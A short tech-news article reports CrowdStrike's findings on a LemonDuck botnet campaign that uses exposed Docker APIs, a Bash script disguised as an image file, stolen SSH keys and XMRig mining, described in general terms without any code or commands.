According to researchers from security firm CrowdStrike, an unknown threat actor is using the LemonDuck cryptomining botnet to target servers via ProxyLogon.
By looking for exposed Docker APIs for initial access, the attackers are then able to run a malicious container by using a custom Docker ENTRYPOINT to download a “core.png” image file, which disguises a Bash script.
Share your thoughts on Cybersecurity and get a free copy of the Hacker's Manual 2022. Help us find how businesses are preparing for the post-Covid world and the implications of these activities on their cybersecurity plans. Enter your email at the end of this survey to get the bookazine, worth $10.99/£10.99.
After gaining initial access, the attackers are able to perform a number of actions: abuse EternalBlue, BlueKeep or similar exploits to escalate privileges, install cryptominers, and move laterally across the compromised networks.
Of all the different cryptominers, the attackers are predominantly using XMRig to mine Monero, privacy-oriented cryptocurrency which is said to be more difficult to trace.
The researchers further explained that LemonDuck comes with a file called “a.asp”, which has the ability to disable the aliyun service on Alibaba’s Cloud, and thus evade detection.
On why the campaign was not detected sooner, the researchers noted the threat actors weren’t mass scanning public IP ranges for exploitable attack surfaces, but rather moving laterally through LemonDuck, looking for SSH keys on filesystem. Once they find SSH keys, they use them to log into the servers, and run all of the aforementioned malicious scripts.
Cryptominers have become extremely popular in these last few years, with the rising price of cryptocurrencies and ease with which they can be sold on the market attracting attention from honest and dishonest actors alike.
Are you a pro? Subscribe to our newsletter
Sign up to the TechRadar Pro newsletter to get all the top news, opinion, features and guidance your business needs to succeed!
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.